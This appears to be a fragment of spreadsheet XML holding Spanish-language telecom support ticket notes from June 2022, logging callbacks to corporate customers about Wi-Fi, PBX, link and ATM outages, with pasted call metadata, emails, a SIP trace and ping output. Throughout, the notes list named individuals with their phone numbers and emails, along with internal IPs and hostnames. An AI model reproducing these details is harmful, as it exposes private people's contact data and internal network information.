PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LESTERL.RODAS
FECHA Y HORA LOCALES: 23/06/2022 12:12:38</t>
  </si>
  <si>
    <t>F4613707</t>
  </si>
  <si>
    <t>CLIENTE DANIEL  RAMIREZ AL 71406428 INFORMA QUE EL PROBLEMA ES CON SU RED WI-FI, SE LE INFORMA QUE TIENEN QUE SOLICITAR QUE SU ENCARGADO IT REVISE SU RED WLAN YA QUE NO ES RESPONSABILIDAD DE CLARO, ADICIONAL SE LE RECOMENDO CONTRATAR WI-FI CORPORATIVO CON CISCO MERAKI POR MEDIO DE SU EJECUTIVO DE CUENTA PARA QUE CLARO LE ADMINISTRE SU RED WIF-I, CLIENTE ENTERADO. CLIENTE INFORMO QUE CON CABLE ETHETNET SI LE FUNCIONA EL INTERNET, SE PROCEDE AL CIERRE DEL INCIDENTE,</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL  RAMIREZ AL 71406428  INDICA QUE AUN NO TIENE INCONVENIENTE CON EL WIFI SE NOTIFICA A GESTOR **
-ID 1001809418
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL  RAMIREZ AL 71406428 NO CONTESTO IVR ENVIA A BUZON, ID: 1001930212.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL  RAMIREZ AL 71406428 SE CONTACTA A CLIENTE Y SE DEJA EN LINEA CON
CLIENTE **
-ID 1001947755
**</t>
  </si>
  <si>
    <t>F4613719</t>
  </si>
  <si>
    <t>SE LLAMO A MONITOREO DE CAJERO 5B ATIENDE ANTONY GARCIA QUIEN INDICA QUE SE TUVO MANTENIMIENTO A UPS, SE REALIZO CAMBIO DE BATERIA Y SE DEJO EQUIPOS EN FUNCIONAMIENTO
1001881868
COLA:
NOMBRE: A: 24207210
NÚMERO: 24207210
DURACIÓN: 0:05:04
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207210
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 23/06/2022 12:57:40</t>
  </si>
  <si>
    <t>F4613721</t>
  </si>
  <si>
    <t>** SE HABLA CON MARLON CONTRERAS (CLIENTE) INFORMA QUE TIENEN DESABILITADA LA CENTRAL POR UN CONFLICTO INTERNO, SE LE COMENTA QUE ESTA ES CONEXION PUNTO A PUNTO, INFORMA QUE HABLARA CON LOS ENCARGADOS Y NOS DEVOLVERA LA LLAMADA PARA VALIDAR -*
-</t>
  </si>
  <si>
    <t>F4613724</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MADELIN REYNOSO 42988757 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001820700</t>
  </si>
  <si>
    <t>F4613726</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CLIENTE AZUCENA GRIJALVA AL 54994791 INDICA QUE ESTA EN HORA DE ALMUERZO QUE SE LE LLAME EN 15 MIN**
-ID 1001903590
**</t>
  </si>
  <si>
    <t>SE ESTA EN CONFERENCIA CON EL CLIENTE ELIAZAR JIMENEZ QUIEN INDICA QUE ESTA VIENDO EL TEMA DE LA PBX CON EL PROVEEDOR.
SOLICITA QUE SE LE LLAME A LAS 12PM.</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE AZUCENA GRIJALVA 54994791 QUIEN INDICA QUE YA ESTAN VIENDO EL TEMA DE LA PBX CON ELIAZAR JIMENEZ.
A NIVEL DE CLARO SE OBSERVA OPERATIVO.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ELIAZAR A QUIEN SE LE INDICO QUE A NIVEL DE CLARO TODO SE OBSERVA ACTIVO.
EL CLIENTE SOLICITA UNA TRAZA Y LUEGO HACER UNA CONFERENCIA.
SE APERTURA WO A BOCX PARA REALIZAR LA TRAZA AL TENER LA TRAZA COMUNICARSE AL 22245301</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ELIAZAR QUIEN INDICA QUE EL PERSONAL DE LA PBX TODAVIA SIGUE REVISANDO POR LO QUE SOLICITA LLAMADA EN 1HRS.
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ELIAZAR AL 55093630 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001903930
**</t>
  </si>
  <si>
    <t>F4613731</t>
  </si>
  <si>
    <t>-* SE HABLA CON GLENDA GONZALEZ 57917400 (CLIENTE) INFORMA QUE DE MOMENTO TODO ESTA OK, SIN EMBARGO POR LA MAÑANA SI TUVIERON LENTITUD, SOLICITA SE MANTENGA EN MONITOREO Y GRAFICANDO PARA MAÑANA A LAS 8:00 HRS -*
-</t>
  </si>
  <si>
    <t>F4613734</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERARDO GONZALEZ 41385114 MENCIONA QUE NO TIENE A CARGO ESTA FISCALIA Y TAMPOCO TIENE CONTACTO DE PR
-ID 1001814599</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001814253</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 MENCIONA QUE EL SERVICIO FUE TRASLADADO A SANTA ROSA
INDICA QUE YA LE HABLARON A EL EJECUTIVO PARA QUE HAGA CAMBIO DE DIRECCION PERO AUN NO LO HA REALIZADO
-ID 1001815700</t>
  </si>
  <si>
    <t>F4613739</t>
  </si>
  <si>
    <t>SE HABLÓ CON CARLOS RÍOS/CLIENTE 56227066 INDICA QUE YA TODO EL PERSONAL SE RETIRÓ, SE LE REENVÍA EL CORREO, CONFIRMA DE RECIBIDO; PIDE SE LE LLAME MAÑANA A LAS 09:00AM PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.
CRIOS@MICOOPE.COM.GT</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 15:28
PARA: CRIOS@MICOPE.COM.GT &lt;CRIOS@MICOPE.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;
ASUNTO: ADMINISTRADORA DEL FONDO DE GARANTIA MICOOPE || 343800002T || SD1138013
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
GRAFICAS DE CONSUMO DE HACE 2 DIAS
GRAFICAS DE HOY
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS RIOS 56227066 MENCIONA QUE PERSISTE EL INCONVENIENTE PERSISTE, SE LE INDICA QUE A NIVEL DE CLARO EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001925346</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS RIOS AL 56227066 INDICA QUE AUN SIGUE EL PROBLEMA DE INESTABILIDAD || SE NOTIFICA A GESTOR **
-ID 1001814820
**</t>
  </si>
  <si>
    <t>F4613756</t>
  </si>
  <si>
    <t>-* JOSE ROBERTO CAS 56980958  (CLIENTE) INFORMA QUE YA HICIERON VALIDACIONES, TODO OK, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE ROBERTO CAS AL 56980958 SOLICITA QUE SE LE LLAME EN 15 MIN **
-ID 1001865657
**</t>
  </si>
  <si>
    <t>F4613772</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TATIANA CASTRO 78519767 QUIEN SOLICITA SE LLAME A  VILMA RIVAS 76085256
-ID 1001922707</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VILMA RIVAS 76085256 SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001923383</t>
  </si>
  <si>
    <t>F4613776</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JENIFER LET AL 56974337  - 55453370 CLIENTE CONFIRMA QUE YA ESTA ESTABLE EL SERVICIO **
-ID 1001867971 - 1001868453
**</t>
  </si>
  <si>
    <t>-* JENIFER LET 56974337 (CLIENTE) CONFIRMA SERVICIO OK Y AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4613779</t>
  </si>
  <si>
    <t>MARIBEL-58594546  SE TIENE EN LINEA --
1001837468
COLA:
NOMBRE: A: 58594546
NÚMERO: 58594546
DURACIÓN: 0:00:28
ESTADO: CONECTADA
DETALLES: 58594546
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 23/06/2022 10:46:21</t>
  </si>
  <si>
    <t>SE HABLA CON CLIEN TE KARMEN SANCHEZ-56970158 QUEDA ENTERADA QUE LA FALLA ES ENSU PBX ### SE PROCEDE AL CIERRE Y LCIENTE ESCALA A SU PROVEEDOR ##
RESULTADO: LLAMADA HECHA
NOMBRE: 56970158
NÚMERO: 56970158
INICIO: HOY, 10:55
FIN: HOY, 10:58
DURACIÓN: 2:59
ID DE LLAMADA: 1001840997</t>
  </si>
  <si>
    <t>CLIENTE COMENTA QUE LA PBX NO LE PERMITE REALIZAR LLAMADAS ENTRANTES, SALIENTES Y ENTRE EXTENSIONES, SE REALIZA UNA LLAMADA DE PRUEBA Y S EOBSERVA QUE PBX LIBERA LAS LLAMADAS ##CLIENTE INDICA QUE DESDE HACE UN AÑO TIENE EL PROBLEMA Y QUE LO ESCALO A EL AREA CORRESPONDIENTE Y AUN NO LE HAN SOLUCIONADO. ## SE LE COMETNA QUE POR PARTE DE CLARO TODO OK Y QUE DEBE ESCALARLO A SU PROVEEDOR DE PBX- CLIENTE ENTERADO## SE PROCEDE  ACONTACTAR A LA PERSONA QUE REALIZO EL REPORTE## A NIVEL DE CLARO TODO OK ##
L1: U 28/08/2086 14:27:05:550 COSLOG: SIP_UA_MESSAGE.C:218 I
SENT TO 10.16.246.199:5060
SIP/2.0 486 BUSY HERE
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BK49553KPZ02L0L991U54P039UCT31438
FROM: &lt;SIP:25095000@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC0403RIXIGLXJ-CC-1
TO: &lt;SIP:+50277941515@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=1492200435
CALL-ID: ASBCVXXRI22RGI03GAAX33A0GG2ZH1L1ZAV8@ATS.GVATS1.IMSHWI.CLARO.COM.GT.1
CSEQ: 1 INVITE
REASON: Q.850 ;CAUSE=17
CONTENT-LENGTH: 0</t>
  </si>
  <si>
    <t>F4613784</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 17:19
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; CARLOS LUIS VENTURA PINEDA &lt;CARLOS.VENTURA@FICOHSA.COM&gt;
CC: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CENTRO DE MONITOREO &lt;HNB-NOC@FICOHSA.COM&gt;; TELECOMUNICACIONES HONDURAS &lt;HNB-TELECOMUNICACIONES@FICOHSA.COM&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: CAIDO DATOS AGN PLAZA PEDREGAL, SPS
*-*-*-*</t>
  </si>
  <si>
    <t>EN ESPERA DE RESPUESA DE CL
RE: CAIDO DATOS AGN PLAZA PEDREGAL, SPS</t>
  </si>
  <si>
    <t>F4613785</t>
  </si>
  <si>
    <t>SE LE SOLICITA AL CLIENTE REINICIAR SU PLANTA PBX, CLIENTE SOLICITA SE LE LLAME EN 15 MINUTOS EN LO QUE REINICIA SU PBX Y REALIZA PRUEBAS. ID: 1001835545</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE FERNANDO GONZALEZ 42503906 VALIDA QUE YA SE SOLVENTÓ EL INCONVENIENTE, AUTORIZA EL CIERRE DEL CASO. ID: 1001843979</t>
  </si>
  <si>
    <t>F4613794</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICKY MEDINA AL 88089128 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 1001870013
**</t>
  </si>
  <si>
    <t>F4613805</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO MOLINA 77544742 INDICA QUE VA MANEJANDO QUE NO PUEDE ATENDER LLAMADA QUE SE LE LLAME AL SEÑOR HUGO GOMEZ  AL 25113800 EXT 150 -1110.
-ID 1001906654
**</t>
  </si>
  <si>
    <t>NOS ATIENDE HUGO GOMEZ QUIEN NOS MANTIENE EN LINEA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE RICARDO MOLINA 77544742 / 78060035 PARA CONSULTAR CUAL ES EL INCONVENIENTE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NOS ATIENDE HUGO GOMEZ QUIEN INDICA QUE YA REALIZO PRUEBAS CON EL AREA DONDE PRESENTARON AFECTACION E INDICA QUE YA NO TIENEN EL PROBLEMA, CLIENTE SOLICITA QUE SE LE CONTACTE A LAS 13:00 HRS PARA VALIDAR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE RICARDO MOLINA 77544742 / 78060035
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE SE ENCUENTRA REALIZANDO PRUEBAS CON TELEFONOS CELULARES DE  LAS SIGUIENTES COMPAÑIAS
MOVISTAR
DIGICEL
CLARO
CLIENTE REALIZA LLAMADAS DE PRUEBA A LOS CELULARES E INDICA QUE NO HA TENIDO PROBLEMAS CON LAS SALIDAS, PERO COMENTA QUE ES POR MOMENTOS NO SIEMPRE PASA EL PROBLEMA.
CLIENTE SE UBICA EN EL AREA DE COBROS EN DONDE TIENE EL PROBLEMA, INDICA QUE TIENE QUE INTENTAR LLAMADAS 3 VECES YA QUE LAS PRIMERAS DOS DA TONO DE OCUPADO Y HASTA LA TERCERA VEZ LA LLAMADA COMPLETA.
SE LE SOLICITA AL CLIENTE QUE PORFAVOR NOS APOYE CON APUNTAR LOS NUMEROS A LOS CUALES ESTA PRESENTANDO PROBLEMAS, CLIENTE SOLICITA LLAMADA EN 30 MIN
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RICARDO MOLINA / HUGO GOMEZ 77544742 / 78060035 NO RESPONDEN MANDAN A BUZON|| SE INTENTARA LUEGO **
-ID 1001892228 - 1001892428
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HUGO GOMEZ  AL 25113800 EXT 150 -1110 CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
-ID 1001907009
**</t>
  </si>
  <si>
    <t>F4613807</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTINA CLIMAS 55448980  RESPONDE JOSE MENCIONA QUE EL INCONVENIENTE PERSISTE, SE LE EXPLICA QUE TODO A NIVEL DE CLARO ESTA BIEN
SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001835986</t>
  </si>
  <si>
    <t>###CLIENTE JOSE MANUEL LOPEZ ESTA CONFORME CON LAS PRUEBAS Y SE PROCEDE A CIERRE DE TICKET EN CONJUNTO CON LLAMADA CON TECNICO##
1001883897
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 50161626
NÚMERO: 50161626
DURACIÓN: 0:20:15
ESTADO: ACD - ASIGNADO A: VELDIN.PALENCIA
DETALLES: 50161626
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 23/06/2022 13:18:10</t>
  </si>
  <si>
    <t>F4613821</t>
  </si>
  <si>
    <t>SE LOGRA LA COMUNICACIÓN CON JOSE LUIS QUIEN COMENTA QUE EN EL SECTOR HAN TENIDO PROBLEMAS CON LA ENERGÍA, COMENTA QUE SI CUENTAN CON UPS PERO QUE POSIBLEMENTE ESTÉ DAÑADO. INDICA QUE LE INFORMARÁ A SU JEFE PARA LA REPARACIÓN O REEMPLAZO DEL MISMO. SE ENVIARÁ CORREO PARA SU SEGUIMIENTO.
1001875488
COLA:
NOMBRE: A: 46123417
NÚMERO: 011 50246123417
DURACIÓN: 0:03:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: +50246123417
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 23/06/2022 12:36:00</t>
  </si>
  <si>
    <t>CORREO ENVIADO || EN ESPERA DE RESPUESTA
DE: WILLIAM GABRIEL SANAVRIA
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 12:47
PARA: MONASTERIOAF@CHURCHOFJESUSCHRIST.ORG &lt;MONASTERIOAF@CHURCHOFJESUSCHRIST.ORG&gt;
CC: JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CNOCCA@CLARO.COM.GT &lt;CNOCCA@CLARO.COM.GT&gt;; ANGEL.CLAVEL@CLARO.COM.GT &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; VICTOR HUGO GONZALEZ &lt;VICTORH.GONZALEZ@CLARO.COM.GT&gt;; JESICA IVON RODRIGUEZ LOPEZ &lt;JESICA.RODRIGUEZ@CLARO.COM.GT&gt;
ASUNTO: ENLACE ALARMADO CON REINCIDENCIA CC_IJSUD_GT_LA_LIBERTAD_PETEN
ESTIMADO CLIENTE,
DEBIDO A QUE SE HAN PRESENTADO ALARMAS RECURRENTES EN EL ENLACE ABAJO DESCRITO, Y SEGÚN LO INDICADO VÍA TELEFÓNICA CON JOSE LUIS, EN EL LUGAR SI CUENTAN CON PROTECCIÓN DE LOS EQUIPOS, SIN EMBARGO SE HA REINICIADO EL ROUTER EN REPETIDAS OCACIONES, DEBIDO A PROBLEMAS CON LA ENERGÍA, JOSE LUIS INDICA QUE SE ESTARÁ VALIDANDO SI EL UPS SE ENCUENTRA EN BUEN ESTADO.
TICKET: F4613821
ID: 349900021T
IDENTIFICADOR DEL CLIENTE: CC_IJSUD_GT_LA_LIBERTAD_PETEN
UBICADO EN: INTERNET.- BARRIO BUENA VISTA , CIUDAD FLORES, LA LIBERTAD PETEN , PETEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4613824</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 42948198 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001844626</t>
  </si>
  <si>
    <t>F4613826</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EDGAR OVANDO 58449394 PERO ENVIA A BUZON
LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>SE LLLAMO NUEVAMENTE AL CLIENTE EDGAR OVANDO 58449394, PERO ENVIA A BUZON.</t>
  </si>
  <si>
    <t>F4613831</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CRISTIAN LOPEZ 97650135 ....</t>
  </si>
  <si>
    <t>F4613845</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BLADIMIR RAMOS AL 79440286 INDICA QUE SIGUE REPORTANDO LENTITUD SE NOTIFICA A GESTOR**
-ID 1001872934
**</t>
  </si>
  <si>
    <t>F4613846</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA A CLIENTE SRTA. FERNANDA TOLEDO 9595-6890 NO CONTESTO IVR ENVIA A BUZON, ID: 1001869379.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDA TOLEDO AL 9595-6890 NO RESPONDE | ENVIA A BUZON ||
SE INTENTARA LUEGO**
-ID 1001875442
**</t>
  </si>
  <si>
    <t>F4613858</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA DE LEON 46345137 CONFIRMA QUE POR EL MOMENTO ESTA ESTABLE INDICA QUE EL PROBLEMA ES CUANDO LLUEVE QUE EMPIEZA LA INTERFERENCIA  **
-ID 1001950632
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA DE LEON 46345137 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO **
-ID 1001938893
**</t>
  </si>
  <si>
    <t>-* ANA DE LEON 46345137 (CLIENTE)  INFORMA QUE YA NO ESTA EN SITIO, VUELVE A LAS 15:00 HRS, SOLICITA SE LE CONTACTE EN DICHO HORARIO -*
-*</t>
  </si>
  <si>
    <t>F4613869</t>
  </si>
  <si>
    <t>PATRICIA-46289564 VALIDA ##VIVO</t>
  </si>
  <si>
    <t>F4613871</t>
  </si>
  <si>
    <t>*- ALEXIS POLANCO 51218481 (CLIENTE) INFORMA QUE EL INCONVENIENTE ES CON LA CONEXION HACIA ALGUNAS IPS Y VPNS QUE MANEJAN EN ZONA 11, YA CONFIRMO Y NO ES INCONVENIENTE CON SU INTERNET ,  BW OK, NAVEGACION OK, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CL ALEXIS POLANCO 51218481  INDICA QUE SIGUE TENIENDO PROBLEMAS DE LENTITUD PARA CARGAR ALGUNAS PAGINAS || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE**
-ID 1001877402
**</t>
  </si>
  <si>
    <t>F4613899</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINORA PAIZ 79536943 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001921866</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DINORA PAIZ 79536943 INDICA QUE SE HA MANTENIDO ESTABLE PERO QUE SE LE DEJE ABIERTO EL TICKET Y QUE SE LE LLAME MAÑANA EN LA MAÑANA PARA EL SEGUIMIENTO**
-ID 1001937322
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DINORA PAIZ AL 79536943 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO QUE POR RATOS TIENE INCONSISTENCIA SOLICITA QUE SE LE LLAME NUEVAMENTE A LAS 15:00 HRS  PARA CONFIRMAR **
-ID 1001883668
**</t>
  </si>
  <si>
    <t>F4613901</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
JUE 23/06/2022 11:34 A.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497¿¿¿¿ ¿¿¿¿¿¿¿¿¿¿ ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿ ¿¿¿ SOLICITAMOS SU APOYO PARA CONFIRMARNOS SI EXISTE UN PROBLEMA DE ENERGÍA EN EL PUNTO REMOTO EL ENLACE PRINCIPAL SE ENCUENTRA DOWN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3901¿¿
ID: 47501009T¿¿
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM0497
UBICADO EN:
LA BODEGA DE ANTIGUA GUATEMALA (ATM 497) 4 CALLE PONIENTE NO.27, ANTIGUA GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4613905</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PAULO CRUZ AL 59518788 SE SOLICITAN DATOS DE VISITA Y BRINDA LOS SIGUIENTES**
HORARIO DE ATENCION: 8:00 A 20:00 HRS
GESTION DE PERMISOS:  SOLO IDENTIFICADO
DIRECCCION: KM. 128.3 ALDEA EL SUNZO, TAXISCO SANTA ROSA
ATENDERA EN SITIO: PAULO CRUZ
-ID 1001855944
**</t>
  </si>
  <si>
    <t>F4613906</t>
  </si>
  <si>
    <t>*-  LESTER RAMOS 58263569 (CLIENTE) NO RESPONDE ,SE LLAMARA LUEGO -*
1001938721
1001938840</t>
  </si>
  <si>
    <t>F4613909</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SUCELI  44535349 INDICA QUE AUN PRESENTA PROBLEMAS DE INESTABILIDAD || SE NOTIFICA A GESTOR **
-ID 1001888269
**</t>
  </si>
  <si>
    <t>-* JAVIER GOMEZ 47409087 (CLIENTE) NO RESPONDE, SE LLAMARA LUEGO -*
-
1001940042
1001940187</t>
  </si>
  <si>
    <t>**SE LLAMA A  CLIENTE AL VIVIAN AL 47531820   NO RESPONDE ENVIA A BUZON **
-ID 1001888269
***</t>
  </si>
  <si>
    <t>F4613910</t>
  </si>
  <si>
    <t>ATM SIGUE OPERATIVO Y ESTABLE, SE CANCELARA VISITA CON CLIENTE, TECNICOS ENTERADOS || SE ENVIA CORROE A CLIENTE
&lt;QTZLGTLFN2T1E03A02EIM3&gt;PING -C 1000 -S 1500 -M 30 -B -VPN-INSTANCE TRANSFERENCIAS  10.103.15.178
  PING 10.103.15.178: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.103.15.178 PING STATISTICS ---
    1000 PACKET(S) TRANSMITTED
    1000 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/7 MS
&lt;QTZLGTLFN2T1E03A02EIM3&gt;DIS CLOCK
2022-06-23 16:39:29-06:00
THURSDAY
TIME ZONE(GMT) : UTC-06:00
&lt;QTZLGTLFN2T1E03A02EIM3&gt;
ASUNTO: RE: GESTION DE ACCESOS F4613910|CC_TYT_GT_ATM2354 | 15 CALLE 0-95 ZONA 7, COLONIA TRIGALES, QUETZALTENANGO,CAJERO 2354
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS 5B.
EN SEGUIMIENTO AL SERVICIO DEL ATM2354 || UBICADO EN 15 CALLE 0-95 ZONA 7, COLONIA TRIGALES, QUETZALTENANGO,CAJERO 2354.
ACTUALMENTE NOSOTROS YA LO VEMOS OPERATIVO Y ESTABLE POR EL ENLACE PRINCIPAL, SOLICITAMOS NOS PUEDAN APOYAR EN VALIDAR EL SERVICIO Y ASÍ CANCELAR LA VISITA EN CONJUNTO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>SE  ENVIO CORREO DE ACCESOS
